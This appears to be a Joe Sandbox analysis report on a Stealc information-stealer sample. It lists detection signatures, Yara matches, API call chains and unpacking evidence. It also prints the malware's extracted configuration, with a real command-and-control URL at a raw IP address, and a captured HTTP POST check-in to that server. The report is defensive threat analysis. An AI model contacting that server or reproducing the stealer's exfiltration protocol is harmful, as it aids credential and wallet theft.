Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mJXdkcP4Wx.exe

Overview

General Information

Sample name:mJXdkcP4Wx.exe
renamed because original name is a hash value
Original sample name:be89dddee1630cde41b95d2df6070bd3.exe
Analysis ID:1529199
MD5:be89dddee1630cde41b95d2df6070bd3
SHA1:bceb2f765aad912ea1e1e3d324f215baece7fcb5
SHA256:e3cd6c9514e46e4bd1e42240e6ec7a82322fe4792a270312ff1ae096b3c4e16f
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • mJXdkcP4Wx.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\mJXdkcP4Wx.exe" MD5: BE89DDDEE1630CDE41B95D2DF6070BD3)
    • WerFault.exe (PID: 1996 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3680 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 828 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6728 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 860 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 1104 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 360 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 1060 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2338388103.0000000000793000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2338357081.0000000000769000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xfa0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000003.2081526955.0000000002310000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.2.mJXdkcP4Wx.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.3.mJXdkcP4Wx.exe.2310000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.mJXdkcP4Wx.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.3.mJXdkcP4Wx.exe.2310000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.mJXdkcP4Wx.exe.22c0e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T18:48:09.342481+020020442431Malware Command and Control Activity Detected192.168.2.54970462.122.184.14480TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000003.2081526955.0000000002310000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: mJXdkcP4Wx.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CCA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_022CCA87
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022C74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_022C74A7
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022C9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_022C9D27
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_022D9107
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022C9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_022C9DC7

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeUnpacked PE file: 0.2.mJXdkcP4Wx.exe.400000.1.unpack
                    Source: mJXdkcP4Wx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022CE697
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022D3B17
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022D4B77
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022CEF87
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022D47D7
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022CE077
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022CDCE7
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CF8F1 FindFirstFileA,0_2_022CF8F1
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022CC0D7
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022C1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022C1937
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022D4107
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022CF917

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.122.184.144:80
                    Source: Malware configuration extractorURLs: http://62.122.184.144/f88d87a7e087e100.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCHost: 62.122.184.144Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 41 35 37 34 41 36 33 46 44 31 34 31 33 30 36 38 39 37 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="hwid"EDA574A63FD14130689737------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="build"default5_pal------AKECBFBAEBKJJJJKFCGC--
                    Source: Joe Sandbox ViewASN Name: GORSET-ASRU GORSET-ASRU
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCHost: 62.122.184.144Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 41 35 37 34 41 36 33 46 44 31 34 31 33 30 36 38 39 37 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="hwid"EDA574A63FD14130689737------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="build"default5_pal------AKECBFBAEBKJJJJKFCGC--
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.0000000000793000.00000004.00000020.00020000.00000000.sdmp, mJXdkcP4Wx.exe, 00000000.00000002.2338273179.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.0000000000793000.00000004.00000020.00020000.00000000.sdmp, mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/Q
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php8
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpH
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpT
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpj
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpr
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/u
                    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Source: 00000000.00000002.2338357081.0000000000769000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 804
                    Source: mJXdkcP4Wx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2338357081.0000000000769000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: mJXdkcP4Wx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@8/29@0/1
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\XC0MQ0KW.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3496
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\12ae768d-00ef-4936-a561-54d8ca14f99aJump to behavior
                    Source: mJXdkcP4Wx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\mJXdkcP4Wx.exe "C:\Users\user\Desktop\mJXdkcP4Wx.exe"
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 804
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 804
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 828
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 860
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 884
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 1104
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 1060
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: wuliwiyixenotafube.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeUnpacked PE file: 0.2.mJXdkcP4Wx.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.notiza:W;.tls:W;.vumob:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeUnpacked PE file: 0.2.mJXdkcP4Wx.exe.400000.1.unpack
